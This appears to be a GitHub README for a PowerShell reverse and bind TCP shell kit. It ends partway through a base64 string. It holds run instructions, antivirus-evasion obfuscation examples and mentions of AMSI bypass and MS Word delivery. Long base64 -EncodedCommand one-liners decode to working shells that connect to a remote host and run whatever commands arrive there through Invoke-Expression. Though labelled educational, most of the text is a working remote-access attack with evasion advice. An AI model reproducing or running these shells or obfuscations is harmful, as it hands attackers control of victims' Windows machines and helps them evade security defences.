PowerShell Reverse TCP

PowerShell scripts for communicating with a remote host.

Remote host will have full control over client's PowerShell and all its underlying commands.

All the shells are based on the Invoke-Expression command and not process pipes.

Tested with PowerShell v5.1.18362.1110 on Windows 10 Enterprise OS (64-bit).

Made for educational purposes. I hope it will help!

This repository started to have known signatures, and unfortunately I don't have time to upload new obfuscations each time, so make sure you do your own changes on the code, and/or use Invoke-Obfuscation.

How to Run
PowerShell Obfuscation
PowerShell Encoded Command
AMSI Bypass
MS Word
Set Up a Listener
Images

How to Run

Change the IP address and port number inside the scripts as necessary.

Open the PowerShell from \src\ and run the commands shown below.

Set the execution policy:

Set-ExecutionPolicy Unrestricted

Run the script:

.\powershell_reverse_tcp.ps1

Or, run the following command from either PowerShell or Command Prompt:

PowerShell -ExecutionPolicy Unrestricted -File .\powershell_reverse_tcp.ps1

PowerShell Obfuscation

Try to bypass an antivirus or some other security mechanisms by obfuscating your scripts.

You can see such obfuscation in the example below.

Original PowerShell command:

(New-Object Net.WebClient).DownloadFile($url, $out)

Obfuscated PowerShell command:

& (`G`C`M *ke-E*) '(& (`G`C`M *ew-O*) `N`E`T`.`W`E`B`C`L`I`E`N`T)."`D`O`W`N`L`O`A`D`F`I`L`E"($url, $out)'

Check the original PowerShell script here, and the fully obfuscated one here.

After manual obfuscation, the original PowerShell script was obfuscated with Invoke-Obfuscation. Credits to the author!

Search the Internet for additional obfuscation techniques and methods.

P.S. As the PowerShell is constantly being updated some regular expressions (e.g. *ke-E*) might start to throw errors due to multiple methods matching the same expression, so the expressions will need to be specified a little bit better.

PowerShell Encoded Command

Use the one-liners below if you don't want to leave any artifacts behind.

[Reverse TCP] To run the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:

PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand JABhACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAGEAZABkAHIAZQBzAHMAIgApAC4AVAByAGkAbQAoACkAOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwAgACQAcAAgAD0AIAAkACgAUgBlAGEAZAAtAEgAbwBzAHQAIAAtAFAAcgBvAG0AcAB0ACAAIgBFAG4AdABlAHIAIABwAG8AcgB0ACAAbgB1AG0AYgBlAHIAIgApAC4AVAByAGkAbQAoACkAOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwAgAGkAZgAgACgAJABhAC4ATABlAG4AZwB0AGgAIAAtAGwAdAAgADEAIAAtAG8AcgAgACQAcAAuAEwAZQBuAGcAdABoACAALQBsAHQAIAAxACkAIAB7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQgBvAHQAaAAgAHAAYQByAGEAbQBlAHQAZQByAHMAIABhAHIAZQAgAHIAZQBxAHUAaQByAGUAZAAiADsAIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwBgAG4AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAYABuACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAUABvAHcAZQByAFMAaABlAGwAbAAgAFIAZQB2AGUAcgBzAGUAIABUAEMAUAAgAHYAMwAuADUAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjAGAAbgAjACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAeQAgAEkAdgBhAG4AIABTAGkAbgBjAGUAawAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwBgAG4AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAYABuACMAIABHAGkAdABIAHUAYgAgAHIAZQBwAG8AcwBpAHQAbwByAHkAIABhAHQAIABnAGkAdABoAHUAYgAuAGMAbwBtAC8AaQB2AGEAbgAtAHMAaQBuAGMAZQBrAC8AcABvAHcAZQByAHMAaABlAGwAbAAtAHIAZQB2AGUAcgBzAGUALQB0AGMAcAAuACAAIAAjAGAAbgAjACAARgBlAGUAbAAgAGYAcgBlAGUAIAB0AG8AIABkAG8AbgBhAHQAZQAgAGIAaQB0AGMAbwBpAG4AIABhAHQAIAAxAEIAcgBaAE0ANgBUADcARwA5AFIATgA4AHYAYgBhAGIAbgBmAFgAdQA0AE0ANgBMAHAAZwB6AHQAcQA2AFkAMQA0AC4AIAAgACAAIwBgAG4AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAYABuACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACIAOwAgACQAYwAgAD0AIAAkAG4AdQBsAGwAOwAgACQAdAAgAD0AIAAkAG4AdQBsAGwAOwAgACQAYgAgAD0AIAAkAG4AdQBsAGwAOwAgACQAdwAgAD0AIAAkAG4AdQBsAGwAOwAgACQAZAAgAD0AIAAkAG4AdQBsAGwAOwAgACQAcgAgAD0AIAAkAG4AdQBsAGwAOwAgAHQAcgB5ACAAewAgACQAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAAQwBsAGkAZQBuAHQAKAAkAGEALAAgACQAcAApADsAIAAkAHQAIAA9ACAAJABjAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAIAAkAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEIAeQB0AGUAWwBdACAAMQAwADIANAA7ACAAJABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABUAGUAeAB0AC4AQQBzAGMAaQBpAEUAbgBjAG8AZABpAG4AZwA7ACAAJAB3ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAdAApADsAIAAkAHcALgBBAHUAdABvAEYAbAB1AHMAaAAgAD0AIAAkAHQAcgB1AGUAOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEIAYQBjAGsAZABvAG8AcgAgAGkAcwAgAHUAcAAgAGEAbgBkACAAcgB1AG4AbgBpAG4AZwAuAC4ALgBgAG4AIgA7ACAAJABiAHkAIAA9ACAAMAA7ACAAZABvACAAewAgACQAdwAuAFcAcgBpAHQAZQAoACIAUABTAD4AIgApADsAIABkAG8AIAB7ACAAJABiAHkAIAA9ACAAJAB0AC4AUgBlAGEAZAAoACQAYgAsACAAMAAsACAAJABiAC4ATABlAG4AZwB0AGgAKQA7ACAAaQBmACAAKAAkAGIAeQAgAC0AZwB0ACAAMAApACAAewAgACQAZAAgAD0AIAAkAGQAIAArACAAJABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIALAAgADAALAAgACQAYgB5ACkAOwAgAH0AIAB9ACAAdwBoAGkAbABlACAAKAAkAHQALgBEAGEAdABhAEEAdgBhAGkAbABhAGIAbABlACkAOwAgAGkAZgAgACgAJABiAHkAIAAtAGcAdAAgADAAKQAgAHsAIAAkAGQAIAA9ACAAJABkAC4AVAByAGkAbQAoACkAOwAgAGkAZgAgACgAJABkAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAKQAgAHsAIAB0AHIAeQAgAHsAIAAkAHIAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBDAG8AbQBtAGEAbgBkACAAJABkACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnADsAIAB9ACAAYwBhAHQAYwBoACAAewAgACQAcgAgAD0AIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnADsAIAB9ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBkACIAOwAgACQAbABlACAAPQAgACQAcgAuAEwAZQBuAGcAdABoADsAIABpAGYAIAAoACQAbABlACAALQBnAHQAIAAwACkAIAB7ACAAJABjAG8AIAA9ACAAMAA7ACAAZABvACAAewAgAGkAZgAgACgAJABsAGUAIAAtAGcAZQAgACQAYgAuAEwAZQBuAGcAdABoACkAIAB7ACAAJABiAHkAIAA9ACAAJABiAC4ATABlAG4AZwB0AGgAOwAgAH0AIABlAGwAcwBlACAAewAgACQAYgB5ACAAPQAgACQAbABlADsAIAB9ACAAJAB3AC4AVwByAGkAdABlACgAJAByAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAkAGMAbwAsACAAJABiAHkAKQApADsAIAAkAGMAbwAgACsAPQAgACQAYgB5ADsAIAAkAGwAZQAgAC0APQAgACQAYgB5ADsAIAB9ACAAdwBoAGkAbABlACAAKAAkAGwAZQAgAC0AZwB0ACAAMAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAHIAIgA7ACAAfQAgAH0AIAB9ACAAfQAgAHcAaABpAGwAZQAgACgAJABiAHkAIAAtAGcAdAAgADAAKQA7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQgBhAGMAawBkAG8AbwByACAAdwBpAGwAbAAgAG4AbwB3ACAAZQB4AGkAdAAuAC4ALgAiADsAIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAEkAbgBuAGUAcgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwAgAH0AIABmAGkAbgBhAGwAbAB5ACAAewAgAGkAZgAgACgAJAB3ACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAHcALgBDAGwAbwBzAGUAKAApADsAIAAkAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgB3ACIAOwAgAH0AIABpAGYAIAAoACQAdAAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJAB0AC4AQwBsAG8AcwBlACgAKQA7ACAAJAB0AC4ARABpAHMAcABvAHMAZQAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAdAAiADsAIAB9ACAAaQBmACAAKAAkAGMAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAYwAuAEMAbABvAHMAZQAoACkAOwAgACQAYwAuAEQAaQBzAHAAbwBzAGUAKAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGMAIgA7ACAAfQAgAGkAZgAgACgAJABiACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGIALgBDAGwAZQBhAHIAKAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGIAIgA7ACAAfQAgAGkAZgAgACgAJAByACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAHIAIgA7ACAAfQAgAGkAZgAgACgAJABkACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGQAIgA7ACAAfQAgAFsAUwB5AHMAdABlAG0ALgBHAEMAXQA6ADoAQwBvAGwAbABlAGMAdAAoACkAOwAgAH0AIAB9AA==

Encoded script will prompt for input. See the slightly altered script here - used the minified script to reduce the command length.

[Reverse TCP - Parameterized] To pass parameters to PowerShell encoded command, run the following command from either PowerShell or Command Prompt:

PowerShell -Command "'127.0.0.1', '9000'" | PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand JABhACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAGEAZABkAHIAZQBzAHMAIgApAC4AVAByAGkAbQAoACkAOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwAgACQAcAAgAD0AIAAkACgAUgBlAGEAZAAtAEgAbwBzAHQAIAAtAFAAcgBvAG0AcAB0ACAAIgBFAG4AdABlAHIAIABwAG8AcgB0ACAAbgB1AG0AYgBlAHIAIgApAC4AVAByAGkAbQAoACkAOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwAgAGkAZgAgACgAJABhAC4ATABlAG4AZwB0AGgAIAAtAGwAdAAgADEAIAAtAG8AcgAgACQAcAAuAEwAZQBuAGcAdABoACAALQBsAHQAIAAxACkAIAB7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQgBvAHQAaAAgAHAAYQByAGEAbQBlAHQAZQByAHMAIABhAHIAZQAgAHIAZQBxAHUAaQByAGUAZAAiADsAIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwBgAG4AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAYABuACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAUABvAHcAZQByAFMAaABlAGwAbAAgAFIAZQB2AGUAcgBzAGUAIABUAEMAUAAgAHYAMwAuADUAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjAGAAbgAjACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAeQAgAEkAdgBhAG4AIABTAGkAbgBjAGUAawAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwBgAG4AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAYABuACMAIABHAGkAdABIAHUAYgAgAHIAZQBwAG8AcwBpAHQAbwByAHkAIABhAHQAIABnAGkAdABoAHUAYgAuAGMAbwBtAC8AaQB2AGEAbgAtAHMAaQBuAGMAZQBrAC8AcABvAHcAZQByAHMAaABlAGwAbAAtAHIAZQB2AGUAcgBzAGUALQB0AGMAcAAuACAAIAAjAGAAbgAjACAARgBlAGUAbAAgAGYAcgBlAGUAIAB0AG8AIABkAG8AbgBhAHQAZQAgAGIAaQB0AGMAbwBpAG4AIABhAHQAIAAxAEIAcgBaAE0ANgBUADcARwA5AFIATgA4AHYAYgBhAGIAbgBmAFgAdQA0AE0ANgBMAHAAZwB6AHQAcQA2AFkAMQA0AC4AIAAgACAAIwBgAG4AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAYABuACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACIAOwAgACQAYwAgAD0AIAAkAG4AdQBsAGwAOwAgACQAdAAgAD0AIAAkAG4AdQBsAGwAOwAgACQAYgAgAD0AIAAkAG4AdQBsAGwAOwAgACQAdwAgAD0AIAAkAG4AdQBsAGwAOwAgACQAZAAgAD0AIAAkAG4AdQBsAGwAOwAgACQAcgAgAD0AIAAkAG4AdQBsAGwAOwAgAHQAcgB5ACAAewAgACQAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAAQwBsAGkAZQBuAHQAKAAkAGEALAAgACQAcAApADsAIAAkAHQAIAA9ACAAJABjAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAIAAkAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEIAeQB0AGUAWwBdACAAMQAwADIANAA7ACAAJABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABUAGUAeAB0AC4AQQBzAGMAaQBpAEUAbgBjAG8AZABpAG4AZwA7ACAAJAB3ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAdAApADsAIAAkAHcALgBBAHUAdABvAEYAbAB1AHMAaAAgAD0AIAAkAHQAcgB1AGUAOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEIAYQBjAGsAZABvAG8AcgAgAGkAcwAgAHUAcAAgAGEAbgBkACAAcgB1AG4AbgBpAG4AZwAuAC4ALgBgAG4AIgA7ACAAJABiAHkAIAA9ACAAMAA7ACAAZABvACAAewAgACQAdwAuAFcAcgBpAHQAZQAoACIAUABTAD4AIgApADsAIABkAG8AIAB7ACAAJABiAHkAIAA9ACAAJAB0AC4AUgBlAGEAZAAoACQAYgAsACAAMAAsACAAJABiAC4ATABlAG4AZwB0AGgAKQA7ACAAaQBmACAAKAAkAGIAeQAgAC0AZwB0ACAAMAApACAAewAgACQAZAAgAD0AIAAkAGQAIAArACAAJABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIALAAgADAALAAgACQAYgB5ACkAOwAgAH0AIAB9ACAAdwBoAGkAbABlACAAKAAkAHQALgBEAGEAdABhAEEAdgBhAGkAbABhAGIAbABlACkAOwAgAGkAZgAgACgAJABiAHkAIAAtAGcAdAAgADAAKQAgAHsAIAAkAGQAIAA9ACAAJABkAC4AVAByAGkAbQAoACkAOwAgAGkAZgAgACgAJABkAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAKQAgAHsAIAB0AHIAeQAgAHsAIAAkAHIAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBDAG8AbQBtAGEAbgBkACAAJABkACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnADsAIAB9ACAAYwBhAHQAYwBoACAAewAgACQAcgAgAD0AIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnADsAIAB9ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBkACIAOwAgACQAbABlACAAPQAgACQAcgAuAEwAZQBuAGcAdABoADsAIABpAGYAIAAoACQAbABlACAALQBnAHQAIAAwACkAIAB7ACAAJABjAG8AIAA9ACAAMAA7ACAAZABvACAAewAgAGkAZgAgACgAJABsAGUAIAAtAGcAZQAgACQAYgAuAEwAZQBuAGcAdABoACkAIAB7ACAAJABiAHkAIAA9ACAAJABiAC4ATABlAG4AZwB0AGgAOwAgAH0AIABlAGwAcwBlACAAewAgACQAYgB5ACAAPQAgACQAbABlADsAIAB9ACAAJAB3AC4AVwByAGkAdABlACgAJAByAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAkAGMAbwAsACAAJABiAHkAKQApADsAIAAkAGMAbwAgACsAPQAgACQAYgB5ADsAIAAkAGwAZQAgAC0APQAgACQAYgB5ADsAIAB9ACAAdwBoAGkAbABlACAAKAAkAGwAZQAgAC0AZwB0ACAAMAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAHIAIgA7ACAAfQAgAH0AIAB9ACAAfQAgAHcAaABpAGwAZQAgACgAJABiAHkAIAAtAGcAdAAgADAAKQA7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQgBhAGMAawBkAG8AbwByACAAdwBpAGwAbAAgAG4AbwB3ACAAZQB4AGkAdAAuAC4ALgAiADsAIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAEkAbgBuAGUAcgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwAgAH0AIABmAGkAbgBhAGwAbAB5ACAAewAgAGkAZgAgACgAJAB3ACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAHcALgBDAGwAbwBzAGUAKAApADsAIAAkAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgB3ACIAOwAgAH0AIABpAGYAIAAoACQAdAAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJAB0AC4AQwBsAG8AcwBlACgAKQA7ACAAJAB0AC4ARABpAHMAcABvAHMAZQAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAdAAiADsAIAB9ACAAaQBmACAAKAAkAGMAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAYwAuAEMAbABvAHMAZQAoACkAOwAgACQAYwAuAEQAaQBzAHAAbwBzAGUAKAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGMAIgA7ACAAfQAgAGkAZgAgACgAJABiACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGIALgBDAGwAZQBhAHIAKAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGIAIgA7ACAAfQAgAGkAZgAgACgAJAByACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAHIAIgA7ACAAfQAgAGkAZgAgACgAJABkACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGQAIgA7ACAAfQAgAFsAUwB5AHMAdABlAG0ALgBHAEMAXQA6ADoAQwBvAGwAbABlAGMAdAAoACkAOwAgAH0AIAB9AA==

[Bind TCP] To run the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:

PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand JABwACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAHAAbwByAHQAIABuAHUAbQBiAGUAcgAiACkALgBUAHIAaQBtACgAKQA7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIgA7ACAAaQBmACAAKAAkAHAALgBMAGUAbgBnAHQAaAAgAC0AbAB0ACAAMQApACAAewAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAFAAbwByAHQAIABuAHUAbQBiAGUAcgAgAGkAcwAgAHIAZQBxAHUAaQByAGUAZAAiADsAIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAYABuACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwBgAG4AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIABCAGkAbgBkACAAVABDAFAAIAB2ADMALgA1ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjAGAAbgAjACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYgB5ACAASQB2AGEAbgAgAFMAaQBuAGMAZQBrACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAYABuACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwBgAG4AIwAgAEcAaQB0AEgAdQBiACAAcgBlAHAAbwBzAGkAdABvAHIAeQAgAGEAdAAgAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBpAHYAYQBuAC0AcwBpAG4AYwBlAGsALwBwAG8AdwBlAHIAcwBoAGUAbABsAC0AcgBlAHYAZQByAHMAZQAtAHQAYwBwAC4AIAAjAGAAbgAjACAARgBlAGUAbAAgAGYAcgBlAGUAIAB0AG8AIABkAG8AbgBhAHQAZQAgAGIAaQB0AGMAbwBpAG4AIABhAHQAIAAxAEIAcgBaAE0ANgBUADcARwA5AFIATgA4AHYAYgBhAGIAbgBmAFgAdQA0AE0ANgBMAHAAZwB6AHQAcQA2AFkAMQA0AC4AIAAgACMAYABuACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwBgAG4AIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACIAOwAgACQAbAAgAD0AIAAkAG4AdQBsAGwAOwAgACQAYwAgAD0AIAAkAG4AdQBsAGwAOwAgACQAdAAgAD0AIAAkAG4AdQBsAGwAOwAgACQAYgAgAD0AIAAkAG4AdQBsAGwAOwAgACQAdwAgAD0AIAAkAG4AdQBsAGwAOwAgACQAZAAgAD0AIAAkAG4AdQBsAGwAOwAgACQAcgAgAD0AIAAkAG4AdQBsAGwAOwAgAHQAcgB5ACAAewAgACQAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAATABpAHMAdABlAG4AZQByACgAIgAwAC4AMAAuADAALgAwACIALAAgACQAcAApADsAIAAkAGwALgBTAHQAYQByAHQAKAApADsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBCAGEAYwBrAGQAbwBvAHIAIABpAHMAI